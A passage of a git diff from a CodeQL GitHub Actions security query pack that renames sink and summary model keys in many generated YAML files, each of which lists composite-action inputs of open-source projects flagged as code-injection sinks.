"code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml index 298ba1ccbe3..221aa83de0b 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionic-framework.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionic-framework", "*", "input.totalShards", "code-injection", "generated"] - ["ionic-team/ionic-framework", "*", "input.shard", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml index 0dc57625890..71007932427 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_ionicons.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/ionicons", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/ionicons", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml index c6fc16750f8..bff13b29ecc 100644 --- a/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml +++ b/ql/lib/ext/generated/composite-actions/ionic-team_stencil.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ionic-team/stencil", "*", "input.paths", "code-injection", "generated"] - ["ionic-team/stencil", "*", "input.output", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml index 0cbbd38d428..1f75dd81c04 100644 --- a/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml +++ b/ql/lib/ext/generated/composite-actions/ipfs_aegir.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ipfs/aegir", "*", "input.browser", "code-injection", "generated"] - ["ipfs/aegir", "*", "input.docker-username", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml index acc6cb91c07..15604c34a17 100644 --- a/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml +++ b/ql/lib/ext/generated/composite-actions/jetbrains_jetbrainsruntime.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jetbrains/jetbrainsruntime", "*", "input.debug-suffix", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml index c59e989db04..aef7f4f6242 100644 --- a/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml +++ b/ql/lib/ext/generated/composite-actions/jhipster_generator-jhipster.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jhipster/generator-jhipster", "*", "input.generator-path", "code-injection", "generated"] - ["jhipster/generator-jhipster", "*", "input.application-packaging", "code-injection", "generated"] @@ -22,6 +22,6 @@ extensions: - ["jhipster/generator-jhipster", "*", "input.extra-args", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jhipster/generator-jhipster", "*", "input.skip-workflow", "output.skip-workflow", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml index b426dfb250d..f3a26e867ec 100644 --- a/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml +++ b/ql/lib/ext/generated/composite-actions/jsocol_django-ratelimit.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jsocol/django-ratelimit", "*", "input.django-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml index 4a0c3c2d30f..4feab5714c7 100644 --- a/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml +++ b/ql/lib/ext/generated/composite-actions/juicedata_juicefs.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["juicedata/juicefs", "*", "input.compress", "code-injection", "generated"] - ["juicedata/juicefs", "*", "input.storage", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml index 74d0ef69f75..3030f81072a 100644 --- a/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml +++ b/ql/lib/ext/generated/composite-actions/jupyter_docker-stacks.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jupyter/docker-stacks", "*", "input.variant", "code-injection", "generated"] - ["jupyter/docker-stacks", "*", "input.image", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml index ac8762d24ea..7f8885d1ec7 100644 --- a/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml +++ b/ql/lib/ext/generated/composite-actions/keycloak_keycloak.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["keycloak/keycloak", "*", "input.job-name", "code-injection", "generated"] - ["keycloak/keycloak", "*", "input.jobs", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml index 6df9a160ec5..93e6b1e0312 100644 --- a/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml +++ b/ql/lib/ext/generated/composite-actions/kserve_kserve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kserve/kserve", "*", "input.directory", "code-injection", "generated"] - ["kserve/kserve", "*", "input.deployment-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml index 0c2793028a0..5284159e9db 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_katib.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/katib", "*", "input.experiments", "code-injection", "generated"] - ["kubeflow/katib", "*", "input.database-type", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml index f5bdc3d4bcc..ac8b8a5150a 100644 --- a/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeflow_training-operator.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeflow/training-operator", "*", "input.context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml index 161022b8cbe..19e9448994e 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_karpenter.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/karpenter", "*", "input.k8sVersion", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml index 391b1917029..82c5713f943 100644 --- a/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubernetes-sigs_kwok.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubernetes-sigs/kwok", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml index 3a45707d59e..2d4108331b9 100644 --- a/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubescape_kubescape.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubescape/kubescape", "*", "input.ORIGINAL_TAG", "code-injection", "generated"] - ["kubescape/kubescape", "*", "input.SUB_STRING", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml index c2e3608f745..ccd49962fa4 100644 --- a/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml +++ b/ql/lib/ext/generated/composite-actions/kubeshop_botkube.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kubeshop/botkube", "*", "input.username", "code-injection", "generated"] - ["kubeshop/botkube", "*", "input.access_token", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml index 9b8e9d1e7ed..a7e56c8626d 100644 --- a/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml +++ b/ql/lib/ext/generated/composite-actions/kyverno_kyverno.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["kyverno/kyverno", "*", "input.version", "code-injection", "generated"] - ["kyverno/kyverno", "*", "input.sbom-name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml index 954f2c34661..4c0df425e45 100644 --- a/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml +++ b/ql/lib/ext/generated/composite-actions/lancedb_lance.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lancedb/lance", "*", "input.repo", "code-injection", "generated"] - ["lancedb/lance", "*", "input.vcpkg_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml index 31cb8acad9e..a69f2303dbe 100644 --- a/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml +++ b/ql/lib/ext/generated/composite-actions/launchdarkly_ios-client-sdk.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["launchdarkly/ios-client-sdk", "*", "input.ios-sim", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml index 4c8df154d8e..c2c87969e93 100644 --- a/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml +++ b/ql/lib/ext/generated/composite-actions/layer5labs_meshmap-snapshot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["layer5labs/meshmap-snapshot", "*", "input.assetLocation", "code-injection", "generated"] - ["layer5labs/meshmap-snapshot", "*", "input.mesheryToken", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml index 8366d5119ae..c1c3bf433cd 100644 --- a/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml +++ b/ql/lib/ext/generated/composite-actions/ldc-developers_ldc.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ldc-developers/ldc", "*", "input.cmake_flags", "code-injection", "generated"] - ["ldc-developers/ldc", "*", "input.build_targets", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml index a5d99cfc5e0..af21dca8205 100644 --- a/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml +++ b/ql/lib/ext/generated/composite-actions/ledgerhq_ledger-live.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ledgerhq/ledger-live", "*", "input.os", "code-injection", "generated"] - ["ledgerhq/ledger-live", "*", "input.turborepo-server-port", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml index e07d26e6a5f..18fdeffe1ec 100644 --- a/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml +++ b/ql/lib/ext/generated/composite-actions/lerna_lerna.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lerna/lerna", "*", "input.install-command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml index 3fe7b27d9d5..ee67e882174 100644 --- a/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml +++ b/ql/lib/ext/generated/composite-actions/lf-edge_eve.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lf-edge/eve", "*", "input.command", "code-injection", "generated"] - ["lf-edge/eve", "*", "input.dockerhub-account", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml index 664c28bfc55..49caeb5f1dc 100644 --- a/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml +++ b/ql/lib/ext/generated/composite-actions/libgit2_libgit2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["libgit2/libgit2", "*", "input.command", "code-injection", "generated"] - ["libgit2/libgit2", "*", "input.container-version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml index 7b90ed20234..dda74b285da 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_pytorch-lightning.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/pytorch-lightning", "*", "input.name", "code-injection", "generated"] - ["lightning-ai/pytorch-lightning", "*", "input.pkg-folder", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml index 62b31c2d3ef..4b144103f8f 100644 --- a/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml +++ b/ql/lib/ext/generated/composite-actions/lightning-ai_torchmetrics.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lightning-ai/torchmetrics", "*", "input.pypi-dir", "code-injection", "generated"] - ["lightning-ai/torchmetrics", "*", "input.torch-url", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml index 427b75730ab..931658c0bb5 100644 --- a/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml +++ b/ql/lib/ext/generated/composite-actions/linkerd_linkerd2.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["linkerd/linkerd2", "*", "input.component", "code-injection", "generated"] - ["linkerd/linkerd2", "*", "input.docker-registry", "code-injection", "generated"] @@ -9,7 +9,7 @@ extensions: - ["linkerd/linkerd2", "*", "input.docker-ghcr-pat", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["linkerd/linkerd2", "*", "input.component", "output.image", "taint", "manual"] - ["linkerd/linkerd2", "*", "input.tag", "output.image", "taint", "manual"] diff --git a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml index 441913730fa..f2963217662 100644 --- a/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml +++ b/ql/lib/ext/generated/composite-actions/logseq_publish-spa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["logseq/publish-spa", "*", "input.accent-color", "code-injection", "generated"] - ["logseq/publish-spa", "*", "input.theme-mode", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml index cbb2b43a2d8..1578e397369 100644 --- a/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml +++ b/ql/lib/ext/generated/composite-actions/macvim-dev_macvim.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["macvim-dev/macvim", "*", "input.contents", "code-injection", "generated"] - ["macvim-dev/macvim", "*", "input.formula", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml index 2f981b5bd63..17c45e0d8ed 100644 --- a/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml +++ b/ql/lib/ext/generated/composite-actions/mamba-org_mamba.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mamba-org/mamba", "*", "input.key_suffix", "code-injection", "generated"] - ["mamba-org/mamba", "*", "input.key_base", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml index 5d3d44e914c..4e26b872800 100644 --- a/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml +++ b/ql/lib/ext/generated/composite-actions/maplibre_maplibre-native.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["maplibre/maplibre-native", "*", "input.artifact-name", "code-injection", "generated"] - ["maplibre/maplibre-native", "*", "input.externalData", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml index 7b41c1b2721..d5fa53d1bbb 100644 --- a/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml +++ b/ql/lib/ext/generated/composite-actions/mastodon_mastodon.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mastodon/mastodon", "*", "input.additional-system-dependencies", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml index 505fbb22005..f90fb1c5e63 100644 --- a/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml +++ b/ql/lib/ext/generated/composite-actions/mavlink_qgroundcontrol.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mavlink/qgroundcontrol", "*", "input.aws_secret_access_key", "code-injection", "generated"] - ["mavlink/qgroundcontrol", "*", "input.aws_key_id", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml index 24223da3c89..d16c0792c6d 100644 --- a/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml +++ b/ql/lib/ext/generated/composite-actions/mdanalysis_mdanalysis.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mdanalysis/mdanalysis", "*", "input.extra-pip-deps", "code-injection", "generated"] - ["mdanalysis/mdanalysis", "*", "input.full-deps", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml index b529c0117f4..4d009c2d47d 100644 --- a/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml +++ b/ql/lib/ext/generated/composite-actions/medic_cht-core.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medic/cht-core", "*", "input.hostname", "code-injection", "generated"] - ["medic/cht-core", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml index 6a46669f05d..afd875c2205 100644 --- a/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml +++ b/ql/lib/ext/generated/composite-actions/medusajs_medusa.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["medusajs/medusa", "*", "input.pathToSeedData", "code-injection", "generated"] - ["medusajs/medusa", "*", "input.password", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml index ec2f45f31db..680bbe27bcb 100644 --- a/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml +++ b/ql/lib/ext/generated/composite-actions/metabase_metabase.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metabase/metabase", "*", "input.organization_name", "code-injection", "generated"] - ["metabase/metabase", "*", "input.github_token", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml index 3574855be3c..ffe074d3dea 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-create-release-pr.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-create-release-pr", "*", "input.artifacts-path", "code-injection", "generated"] - ["metamask/action-create-release-pr", "*", "input.created-pr-status", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml index 4ee1b878e54..e53a58412c9 100644 --- a/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml +++ b/ql/lib/ext/generated/composite-actions/metamask_action-npm-publish.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["metamask/action-npm-publish", "*", "input.subteam", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml index 8453a2d415c..a899f727e39 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_fluentui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/fluentui", "*", "input.workspaces", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml index dc86b795981..0c7c2e1bded 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_playwright.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/playwright", "*", "input.report_dir", "code-injection", "generated"] - ["microsoft/playwright", "*", "input.connection_string", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml index ca9cc034d10..3d631e60dc3 100644 --- a/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml +++ b/ql/lib/ext/generated/composite-actions/microsoft_wsl.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["microsoft/wsl", "*", "input.comment", "code-injection", "generated"] - ["microsoft/wsl", "*", "input.similar_issues_text", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml index b8aecfd5e3d..2f8710d2cbd 100644 --- a/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml +++ b/ql/lib/ext/generated/composite-actions/milvus-io_milvus.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["milvus-io/milvus", "*", "input.tag", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml index e7ac083da83..5490e62cdc9 100644 --- a/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml +++ b/ql/lib/ext/generated/composite-actions/mlflow_mlflow.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mlflow/mlflow", "*", "input.python-version", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml index 5cac21a0751..0c6df201a1c 100644 --- a/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml +++ b/ql/lib/ext/generated/composite-actions/modin-project_modin.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["modin-project/modin", "*", "input.parallel", "code-injection", "generated"] - ["modin-project/modin", "*", "input.runner", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml index 83e1345edf2..7d0b894f35d 100644 --- a/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml +++ b/ql/lib/ext/generated/composite-actions/mozilla_addons-server.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["mozilla/addons-server", "*", "input.run", "code-injection", "generated"] - ["mozilla/addons-server", "*", "input.push", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/composite-actions/mozilla_bedrock.model.yml 